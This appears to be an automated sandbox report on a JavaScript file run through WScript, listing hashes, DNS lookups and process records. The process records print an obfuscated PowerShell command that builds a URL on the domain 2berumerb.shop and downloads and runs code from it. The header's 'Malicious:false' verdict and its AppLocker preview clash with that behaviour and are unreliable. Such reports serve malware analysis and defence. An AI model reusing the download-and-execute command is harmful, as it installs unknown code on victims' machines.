                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Reputation:high, very likely benign file
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                File type:Unicode text, UTF-8 text, with very long lines (1221)
                                Entropy (8bit):4.782340731571732
                                TrID:
                                  File name:js (2).js
                                  File size:179'433 bytes
                                  MD5:57facd3bff711855391b43b671622e00
                                  SHA1:d492092628803eae1048a82ddd37be682bdcfb58
                                  SHA256:ce3d59c9b275e385dfbb65fd8b58165f8ed78a55d324f7a6a765c48e32f6202c
                                  SHA512:aea6fd99f2039be7cc34344c7862bfd12b4350b277102ae0e7750eb85b34001372e1238db513977e1723241564ecea8a1a480cf338bcbf379b55466541682dc2
                                  SSDEEP:1536:s2L1hDEwi2eZDlO3iE+WSk117+JDmUItxqccOKNG9Ewi2eZDlO3iE+WSR117+JDe:swLi2NqJ8NVLi2N5J8NpLi2Np
                                  TLSH:0604C67BB785233504E39359260E26DD2229D034B276876078DF912D179A07CCBBBBF6
                                  File Content Preview:var _0xca648c = ["126.96.103.100.110.100.125.122.51.123.102.102.125.85.106.96.100.127.59.51.94.96.103.58.59.86.89.123.102.106.108.122.122.", "101.108.122.122.41.121.102.126.108.123.122.97.108.101.", "106.102.103.97.102.122.125.41.36.36.97.108.104.109.", "
                                  Icon Hash:68d69b8bb6aa9a86
                                  TimestampSource PortDest PortSource IPDest IP
                                  Apr 14, 2025 16:46:59.322935104 CEST6254053192.168.2.41.1.1.1
                                  Apr 14, 2025 16:46:59.447236061 CEST53625401.1.1.1192.168.2.4
                                  Apr 14, 2025 16:47:08.250111103 CEST6040653192.168.2.41.1.1.1
                                  Apr 14, 2025 16:47:08.356874943 CEST53604061.1.1.1192.168.2.4
                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Apr 14, 2025 16:46:59.322935104 CEST192.168.2.41.1.1.10x415Standard query (0)2berumerb.shopA (IP address)IN (0x0001)false
                                  Apr 14, 2025 16:47:08.250111103 CEST192.168.2.41.1.1.10x93bbStandard query (0)c.pki.googA (IP address)IN (0x0001)false
                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Apr 14, 2025 16:46:59.447236061 CEST1.1.1.1192.168.2.40x415Name error (3)2berumerb.shopnonenoneA (IP address)IN (0x0001)false
                                  Apr 14, 2025 16:47:08.029167891 CEST1.1.1.1192.168.2.40x60a1No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                  Apr 14, 2025 16:47:08.029167891 CEST1.1.1.1192.168.2.40x60a1No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                  Apr 14, 2025 16:47:08.356874943 CEST1.1.1.1192.168.2.40x93bbNo error (0)c.pki.googpki-goog.l.google.comCNAME (Canonical name)IN (0x0001)false
                                  Apr 14, 2025 16:47:08.356874943 CEST1.1.1.1192.168.2.40x93bbNo error (0)pki-goog.l.google.com142.251.15.94A (IP address)IN (0x0001)false

                                  Click to jump to process

                                  Click to jump to process

                                  Click to dive into process behavior distribution

                                  Click to jump to process

                                  Target ID:0
                                  Start time:10:46:53
                                  Start date:14/04/2025
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\js (2).js"
                                  Imagebase:0x7ff781000000
                                  File size:170'496 bytes
                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:1
                                  Start time:10:46:56
                                  Start date:14/04/2025
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:conhost --headless powershell $xmtwzilk='ur' ;set-alias protons c$($xmtwzilk)l;$fovrdle=(6812,6860,6863,6876,6879,6871,6863,6876,6860,6808,6877,6866,6873,6874,6809,6811,6808,6874,6866,6874,6825,6877,6823,6864,6870,6867,6860,6859,6860,6861,6812,6812);$lukhvjgc=('ertigos','get-cmdlet');$arczugy=$fovrdle;foreach($aolnsembz in $arczugy){$pdjoywbzaf=$aolnsembz;$bcwuyipnds=$bcwuyipnds+[char]($pdjoywbzaf-6762);$xrulwmcyqbk=$bcwuyipnds; $gjicsretdvanx=$xrulwmcyqbk};$movkfdqx[2]=$gjicsretdvanx;$uilwjshkcqx='rl';$xzsofvgu=1;.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(protons -useb $gjicsretdvanx)
                                  Imagebase:0x7ff62fc20000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:2
                                  Start time:10:46:56
                                  Start date:14/04/2025
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:powershell $xmtwzilk='ur' ;set-alias protons c$($xmtwzilk)l;$fovrdle=(6812,6860,6863,6876,6879,6871,6863,6876,6860,6808,6877,6866,6873,6874,6809,6811,6808,6874,6866,6874,6825,6877,6823,6864,6870,6867,6860,6859,6860,6861,6812,6812);$lukhvjgc=('ertigos','get-cmdlet');$arczugy=$fovrdle;foreach($aolnsembz in $arczugy){$pdjoywbzaf=$aolnsembz;$bcwuyipnds=$bcwuyipnds+[char]($pdjoywbzaf-6762);$xrulwmcyqbk=$bcwuyipnds; $gjicsretdvanx=$xrulwmcyqbk};$movkfdqx[2]=$gjicsretdvanx;$uilwjshkcqx='rl';$xzsofvgu=1;.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(protons -useb $gjicsretdvanx)
                                  Imagebase:0x7ff7016f0000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Reset < >
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1383570033.00007FFC3C7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3C7F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffc3c7f0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7aef56ca9995aa5a285f662feb638174b197d321540a6aed46649aafc1f312b4
                                    • Instruction ID: 644384f4108a4ed003f6525c796ee70730f5f2ab6d752eb4dccc546619dd1770
                                    • Opcode Fuzzy Hash: 7aef56ca9995aa5a285f662feb638174b197d321540a6aed46649aafc1f312b4
                                    • Instruction Fuzzy Hash: 79A2053190DA9E8FEBA5DB2888956787BE1EF56340F0800BEC54DCB193DD29BC46C725
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1383570033.00007FFC3C7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3C7F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffc3c7f0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0d1bc89e283e8089a9be922204bdf982577b02dae6ad2a7e8acb6bca3674c853
                                    • Instruction ID: 40bf7e0dc5f6dd88454033d23446a0df82e35df87eff9109f19668cfdba7fe80
                                    • Opcode Fuzzy Hash: 0d1bc89e283e8089a9be922204bdf982577b02dae6ad2a7e8acb6bca3674c853
                                    • Instruction Fuzzy Hash: D4E1F62190D7DA4FEB5AD72848955783FE1EF57350B0941FEC489CB2E3D918AC0AD362
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1383570033.00007FFC3C7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3C7F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffc3c7f0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7ca5f14941fd6765fc46d3c14b20bdcf771e6ef9429dfd19f3e03366f5402e15
                                    • Instruction ID: 911d2591f8d077cb7b863e5dc6576512f3d4ad75ee6ea51ba208e2c5b3d32b46
                                    • Opcode Fuzzy Hash: 7ca5f14941fd6765fc46d3c14b20bdcf771e6ef9429dfd19f3e03366f5402e15
                                    • Instruction Fuzzy Hash: E8D1466190DAAE4FEBA6E72888955BD7FE1EF46394B0800FBC54CC70D3E918B805C361
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1383570033.00007FFC3C7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3C7F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffc3c7f0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 57243377edf1d6402bad9d359e33841a3a11da5a9d790d550ea62970e91e21fd
                                    • Instruction ID: c7d6e7a4e94fd7e0d5c9ca897bc253c9cc199e2642385c71f243e360c50f6a22
                                    • Opcode Fuzzy Hash: 57243377edf1d6402bad9d359e33841a3a11da5a9d790d550ea62970e91e21fd
                                    • Instruction Fuzzy Hash: BE91F73060CB8D4FDB99DB2C88959397BE1EF66350B1901EEC44AC72A3C925FC46C791
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1383570033.00007FFC3C7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3C7F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffc3c7f0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c677fed95cd74a2dc17369d22d13e413c555b4b3b08294e944c16c48f344a6ad
                                    • Instruction ID: e94bf2407b8c140c3dce9faa1095d22f848d8ba08a22ff6710b323eb5f3274f0
                                    • Opcode Fuzzy Hash: c677fed95cd74a2dc17369d22d13e413c555b4b3b08294e944c16c48f344a6ad
                                    • Instruction Fuzzy Hash: 5E512652A0DADA4FE79AC22818952B83BE1DF47290F0D01FBC44DCB0D3DD1A6C0AD361
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1383213683.00007FFC3C720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3C720000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffc3c720000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 827ffc17c68b4394729c7d3db2028b5df0b9573fb2b38fd978749fd0e3804eba
                                    • Instruction ID: 9a145d4166ecbc79197407229271723c4770ee15224b772bfe991a1c5b4bc21d
                                    • Opcode Fuzzy Hash: 827ffc17c68b4394729c7d3db2028b5df0b9573fb2b38fd978749fd0e3804eba
                                    • Instruction Fuzzy Hash: 6801677111CB0C8FDB44EF0CE451AA9B7E0FB95364F50056DE58AC36A1DA36E981CB45
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1383570033.00007FFC3C7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3C7F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffc3c7f0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 790952e1770000effc373219a2dd3b14c0eea591d5f2a4c2bdbd2f38767b42e6
                                    • Instruction ID: 03a21ca6d044e96c2a5d1b27588a48626785e4abc0b1f3719f4e5943d7eacc56
                                    • Opcode Fuzzy Hash: 790952e1770000effc373219a2dd3b14c0eea591d5f2a4c2bdbd2f38767b42e6
                                    • Instruction Fuzzy Hash: 2731D642D4EBDA5FF766D3280CA51A82FE19F5719074D40FBC988CB2E7D80D680AD366